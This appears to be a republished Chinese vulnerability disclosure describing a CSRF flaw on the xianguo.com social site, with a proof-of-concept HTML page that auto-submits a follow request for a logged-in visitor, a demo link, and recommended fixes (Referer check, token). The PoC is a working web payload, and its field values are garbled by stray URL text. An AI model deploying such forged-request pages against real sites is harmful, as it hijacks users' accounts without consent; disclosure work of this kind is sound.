鲜果网某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布文字、加关注等等!
详细说明:在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。
演示地址:http://in.imlonghao.com/WooYun-XXXXX/ (用户名/密码:imlonghao)
登录状态下访问,会自动发一条名为Hello World的微博,并会关注一个用户。
漏洞地址:http://xianguo.com/beings/follow
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://xianguo.com/beings/follow" method="post">
<input type="text" name="beingsIds" value=http://netsecurity.51cto.com/art/201211/"1378148" />
<input type="text" name="parentId" value=http://netsecurity.51cto.com/art/201211/"0" />
<input type="text" name="ftype" value=http://netsecurity.51cto.com/art/201211/"0" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>
接口返回信息
效果
【发文字】
修复方案:
检查POST来路Referer
在POST的信息中加token
【编辑推荐】
- 京东商城出现重大漏洞:损失或达两亿
- 认识网络端口及时发现端口漏洞
- Win 8的一个新的零日漏洞值多少钱?
- 浅谈路由器安全漏洞的严重性
- 安卓系统均存短信欺诈漏洞
推荐阅读
据国外媒体11月5号报道,美国北卡罗来纳州州立大学研究员日前在进行一项有关智能手机的研究项目中侯晨 发现了一个存在于安卓平台的“短信欺诈”漏洞,可能会使众多使用该平台的用户受到影响。什么是&ldquo>>>详细阅读
本文标题:鲜果网某处CSRF漏洞可蔓延蠕虫
地址:http://www.17bianji.com/anquan/buding/15084.html
1/2 1